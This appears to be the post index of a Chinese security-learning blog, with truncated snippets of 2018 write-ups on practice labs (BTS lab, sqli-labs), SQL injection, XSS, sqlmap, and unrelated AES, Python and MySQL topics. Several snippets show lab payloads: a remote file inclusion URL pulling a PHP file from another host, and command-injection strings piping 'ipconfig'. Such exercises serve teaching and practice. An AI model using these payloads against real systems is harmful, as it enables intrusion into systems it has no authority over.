原创 BTS測試實驗室--遠程文件包含和服務器端注入攻略
遠程文件包含 構造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php 可以看到,遠
2018-11-04 07:37:01
原创 BTS測試實驗室 --- 注入關攻略
0x00 命令注入 payload: 127.0.0.1 | ipconfig 13||ipconfig 127.0.0.1&ipconfig 127.0.0.1&&ipconfig 上面的方式主要是通過管道符讓系統執行了命令。‘
2018-11-04 07:37:01
原创 BTS測試實驗室 --- SQL注入關攻略
一. Sql注入1 判斷注入點:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1’ 如下圖,報錯,存在sql注入 手工注入, (1)爆字段數: http://127.
2018-10-27 07:20:14
1
原创 sqli-labs練習(十八、十九、二十、二十一)
sqli-labs練習十八 — POST-Headers Injection-Uagent field-Error based 按照正常思路,先是對username和password輸入框進行測試,並沒有找到注入點,頁面上顯示的ip
2018-10-20 07:22:37
原创 XSS小結
XSS是什麼? XSS全稱跨站腳本(Cross Site Scripting),爲不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故縮寫爲XSS。跨站點腳本(XSS)攻擊是一種注射型攻擊,攻擊者在可
2018-10-20 07:22:37
原创 SQL 注入總結
0x01 什麼是SQL注入 sql注入就是一種通過操作輸入來修改後臺操作語句達到執行惡意sql語句來進行攻擊的技術。 0x02 SQL注入的分類 按變量類型分 數字型 字符型 按HTTP提交方式分 GET注入 POST注入 Co
2018-10-13 07:27:35
原创 AES內部加密原理
0x01 AES概述 高級加密標準(Advanced Encryption Standard,縮寫:AES),在密碼學中又稱Rijndael加密法,是美國聯邦政府採用的一種區塊加密標準。這個標準用來替代原先的DES,已經被多方分析且廣
2018-10-10 07:44:01
原创 python類定義(普通類屬性、實例屬性;普通類方法、類方法、靜態方法)一遍過
0x01 代碼實例 #!/usr/bin/env python 3.7 # -*- coding: utf-8 -*- # @Time : 2018/9/29 20:44 # @Author : wkend # @File
2018-10-02 06:36:14
2
原创 解析漏洞總結
0x01 什麼是解析漏洞? 簡單的說,解析漏洞就是web容器將其他格式的文件解析爲可執行腳本語言,攻擊者可以利用這個特徵去執行一些攻擊行爲。 oxo2 概述 通常會出現解析漏洞的web容器有IIS 6.0、Nginx、Apache。
2018-09-26 09:04:17
4
原创 主動信息收集 --- 二層發現
二層主機發現主要利用的是arp協議,所以只能發現在同一個網段裏的主機,不能路由,但是掃描速度快、可靠。 0x01 arping 探測某個主機命令行 用法 arping [-f 收到第一個回覆就停止] [-c 指定發送的數量] [-s
2018-09-16 23:14:39
3
原创 sqlmap的使用 ---- 自帶繞過腳本tamper
sqlmap在默認的的情況下除了使用char()函數防止出現單引號,沒有對注入的數據進行修改,還可以使用–tamper參數對數據做修改來繞過waf等設備。 0x01 命令如下 sqlmap -u [url] --tamper [模塊名
2018-09-16 00:08:22
原创 sqlmap的使用 ---- 進階
1. –level 探測等級 一共有5個等級,默認是1。 sqlmap使用的payload可以在xml\payloads中看到,也可以根據相應的格式添加自己的payload,5級包含的payload最多。 http cookie在
2018-09-13 08:37:58
原创 sqlmap的使用 ---- 入門
sqlmap是一個自動化的sql注入工具,其主要功能就是掃描、發現給定url的sql注入漏洞。 1. 判斷是否存在注入 當url中存在兩個參數時,要使用雙引號 sqlmap -u +url 2. 判斷文本中的請求是否存在注入 利用
2018-09-08 00:15:20
原创 滲透測試 ---- 信息收集
《web安全攻防–滲透測試實戰指南》讀書筆記 1. 收集域名信息 1.1. Whois查詢 1.2. 備案信息查詢 2. 收集敏感信息 3. 收集子域名信息 4. 收集常用端口信息 5. 指紋識別 6. 查找真實IP 7
2018-09-06 23:09:34
原创 win10系統MySQL 8.0的下載安裝超詳細教程
1. 下載 地址:https://www.mysql.com/downloads/ 點擊Windows,選擇平臺,下載MySQL Install 進入下載頁, 點擊Download之後進入下圖,可以選擇登錄,也可以跳過
2018-09-05 00:45:28